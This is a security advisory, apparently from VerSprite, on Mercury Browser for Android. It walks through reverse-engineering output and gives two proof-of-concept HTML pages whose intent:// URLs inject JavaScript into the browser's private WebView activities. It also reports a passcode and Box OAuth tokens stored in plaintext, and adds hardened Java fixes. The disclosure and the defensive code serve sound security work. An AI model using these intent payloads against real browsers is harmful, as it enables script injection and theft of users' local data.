Multiple Vulnerabilities in Mercury Browser for Android | VerSprite

Multiple Vulnerabilities in Mercury Browser for Android Version 2.2.2 & 3.0.0

Written By: Versprite

Insecure Intent URL Implementation

An insecure implementation of the intent URL scheme revolves around the Intent.parseUri() method, which allows you to create an intent from a URI. The first thing we did when reversing the Mercury Browser was search for that specific method within the target packages.

In [12]: show_Paths(d, x.tainted_packages.search_methods(".", "parseUri", "."))
1 Lcom/ilegendsoft/mercury/ui/widget/webview/e;->shouldOverrideUrlLoading(Landroid/webkit/WebView; Ljava/lang/String;)Z (0x18a) ---> Landroid/content/Intent;->parseUri(Ljava/lang/String; I)Landroid/content/Intent;
1 Lcom/ilegendsoft/mercury/ui/widget/webview/e;->shouldOverrideUrlLoading(Landroid/webkit/WebView; Ljava/lang/String;)Z (0x1be) ---> Landroid/content/Intent;->parseUri(Ljava/lang/String; I)Landroid/content/Intent;
1 Lcom/ilegendsoft/mercury/ui/widget/webview/e;->shouldOverrideUrlLoading(Landroid/webkit/WebView; Ljava/lang/String;)Z (0x246) ---> Landroid/content/Intent;->parseUri(Ljava/lang/String; I)Landroid/content/Intent;

We can see the parseUri() method being called from the com.ilegendsoft.mercury.ui.widget.webview.e class. Now we want to see whether the URL being loaded within the browser's MainActivity somehow winds up as the second argument to the shouldOverrideUrlLoading() method. If we generate XREFs for the class we can see a call being made from com.ilegendsoft.mercury.ui.activities.MainActivity, and to save you the headache of going through the entire CFG, we did validate that this was indeed the case.

In [11]: d.CLASS_Lcom_ilegendsoft_mercury_ui_widget_webview_e.show_xref()
########## XREF
F: Lcom/ilegendsoft/mercury/ui/activities/MainActivity; a (Lcom/ilegendsoft/mercury/ui/widget/webview/CustomWebView;)V a
####################

The browser checks whether the URL starts with the "intent://" scheme and, if it does, passes the URL into the parseUri() call. The resulting Intent object is then used to call startActivity() on the MainActivity.

[Images: mercury_ida_01, mercury_ida_02]

Now that we know the browser supports an insecure implementation of the intent URL scheme, we can investigate Activities that would "benefit" from an intent object that we now control. VerSprite found two target Activities that could be used for either disclosing local files or creating a UXSS:
– com.ilegendsoft.social.common.SimpleWebViewActivity
– com.ilegendsoft.clouddrive.box.BoxAuthActivity

The BoxAuthActivity is used for Box authorization within the Mercury Browser, and retrieves an intent object within its onCreate() method. It takes the string extra "url_authorize" and passes it as an argument to a method that loads this string into a WebView via loadUrl().

[Image: mercury_ida_03]

Exploiting this requires loading an HTML page we control in the Mercury browser. The JavaScript within the page navigates to a new intent URL, which sends an intent object carrying potentially malicious JavaScript to the target component.

<html>
  <body>
    <script>
      location.href="intent:#Intent;S.url_authorize=javascript:alert(1);SEL;component=com.ilegendsoft.mercury/com.ilegendsoft.clouddrive.box.BoxAuthActivity;end";
    </script>
  </body>
</html>

The SimpleWebViewActivity has pretty much the same issue. It first calls getIntent() to retrieve the intent object, then uses getStringExtra() with the key "load" to obtain a string that it passes to loadUrl() on a WebView. We can exploit this in exactly the same way as before.

[Image: mercury_ida_04]

<html>
  <body>
    <script>
      location.href="intent:#Intent;S.load=javascript:alert(1);SEL;component=com.ilegendsoft.mercury/com.ilegendsoft.social.common.SimpleWebViewActivity;end";
    </script>
  </body>
</html>

It is important to realize that both of these vulnerable Activities are not exported and are considered private components of the browser application, which gives this type of issue a bit more impact: a web page reaches components that no other app on the device could start directly.
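The root cause above is that the parsed Intent is started exactly as the page supplied it, including the explicit component and selector. The following WebViewClient is an added example written for this advisory, not Mercury's code; it shows that vulnerable pattern in a comment beside the hardened form, in which the page can no longer name a component or selector and only activities declared BROWSABLE can match. The class name and constructor are assumptions.

```java
import android.content.ActivityNotFoundException;
import android.content.Context;
import android.content.Intent;
import android.webkit.WebView;
import android.webkit.WebViewClient;

import java.net.URISyntaxException;

// Hypothetical client for illustration; the host app's real WebViewClient is assumed to be similar.
public class SafeIntentWebViewClient extends WebViewClient {
    private final Context context;

    public SafeIntentWebViewClient(Context context) {
        this.context = context;
    }

    @Override
    public boolean shouldOverrideUrlLoading(WebView view, String url) {
        if (url == null || !url.startsWith("intent:")) {
            return false; // ordinary http(s) navigation: let the WebView load it
        }
        Intent intent;
        try {
            intent = Intent.parseUri(url, Intent.URI_INTENT_SCHEME);
        } catch (URISyntaxException e) {
            return true; // malformed intent URL: consume it, load nothing
        }

        // Vulnerable pattern described in the advisory:
        //     context.startActivity(intent);
        // The page controls "component=" and the SEL selector, so it can
        // address non-exported activities of the browser itself.

        // Hardened handling: strip anything that lets the page pick the
        // target, and require the BROWSABLE category so only activities
        // that opted in to being launched from web content can resolve.
        intent.addCategory(Intent.CATEGORY_BROWSABLE);
        intent.setComponent(null);
        intent.setSelector(null);
        intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
        try {
            context.startActivity(intent);
        } catch (ActivityNotFoundException e) {
            // No BROWSABLE handler exists; drop the navigation silently.
        }
        return true;
    }
}
```

Extras such as "url_authorize" and "load" still travel with the implicit intent, so any activity in the same app that does declare a BROWSABLE filter must also treat its extras as untrusted input rather than passing them straight to loadUrl().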

Passcode and OAuth Exposure

The Mercury Browser allows you to configure a passcode for the application, which you will have to submit each time you open it as a protection mechanism. The problem is the passcode is stored in the browser’s shared preferences unencrypted.

ZCloudConfig.xml
application.xml
com.ilegendsoft.mercury_preferences.xml
lbsdata.xml
mapplication.xml
menu_add_function.xml
menus.xml
mercury_flurry_log_event.xml
merucry_application_theme.xml
navigation_v_2.xml
passcode.xml
readinglist_shredpreference.xml
search_engine_v_2.xml
speed_dial_v_2.xml
speeddial.xml
zcloud_db.xml

passcode.xml:
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="passcode">1111</string>
</map>

The OAuth tokens used for your Box account are also stored unencrypted within SharedPreferences, inside box_auth_info.xml.
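As an added illustration of the storage fix (example code, not Mercury's), the helper below keeps the same "passcode" preferences file the listing shows but stores a random salt and a PBKDF2 hash instead of the plaintext value, and verifies candidates with a constant-time comparison. The class name, key names and iteration count are assumptions; PBKDF2WithHmacSHA256 is assumed to be available on the target API level.

```java
import android.content.Context;
import android.content.SharedPreferences;
import android.util.Base64;

import java.security.MessageDigest;
import java.security.SecureRandom;
import java.security.spec.KeySpec;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;

// Hypothetical replacement for writing <string name="passcode">1111</string> to passcode.xml.
public final class PasscodeStore {
    private static final String PREFS = "passcode";      // same file as the advisory's listing
    private static final int ITERATIONS = 100_000;       // assumed work factor
    private static final int KEY_BITS = 256;

    private PasscodeStore() {}

    // Derive a fixed-length hash from the passcode and a per-install salt.
    static byte[] derive(String passcode, byte[] salt) throws Exception {
        KeySpec spec = new PBEKeySpec(passcode.toCharArray(), salt, ITERATIONS, KEY_BITS);
        return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA256")
                .generateSecret(spec).getEncoded();
    }

    public static void save(Context ctx, String passcode) throws Exception {
        byte[] salt = new byte[16];
        new SecureRandom().nextBytes(salt);
        byte[] hash = derive(passcode, salt);
        ctx.getSharedPreferences(PREFS, Context.MODE_PRIVATE).edit()
                .remove("passcode") // never persist the plaintext value
                .putString("passcode_salt", Base64.encodeToString(salt, Base64.NO_WRAP))
                .putString("passcode_hash", Base64.encodeToString(hash, Base64.NO_WRAP))
                .apply();
    }

    public static boolean verify(Context ctx, String candidate) throws Exception {
        SharedPreferences p = ctx.getSharedPreferences(PREFS, Context.MODE_PRIVATE);
        String salt = p.getString("passcode_salt", null);
        String hash = p.getString("passcode_hash", null);
        if (salt == null || hash == null) {
            return false; // no passcode enrolled
        }
        byte[] expected = Base64.decode(hash, Base64.NO_WRAP);
        byte[] actual = derive(candidate, Base64.decode(salt, Base64.NO_WRAP));
        return MessageDigest.isEqual(expected, actual); // constant-time compare
    }
}
```

A four-digit passcode has only ten thousand possible values, so hashing raises the cost of an offline guess but does not make the file safe to leak; attempt limiting in the app, or keeping the secret behind the Android Keystore, is still needed.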

Conclusion

The previous version of Mercury Browser for Android (2.2.2) has been verified to have all of the above vulnerabilities. Mercury Browser for Android (3.0.0) has only been verified to have the insecure intent URL implementation vulnerability, and it is assumed that the passcode is still being stored unencrypted for now. VerSprite has validated that version 2.2.3 of Mercury Browser for Android is not vulnerable to the insecure intent URL implementation vulnerability, but has not tested and validated the unencrypted storage of the sensitive information above. It is recommended that all users running this browser on their Android devices not update to the latest version (3.0.0) on the Google Play Store.
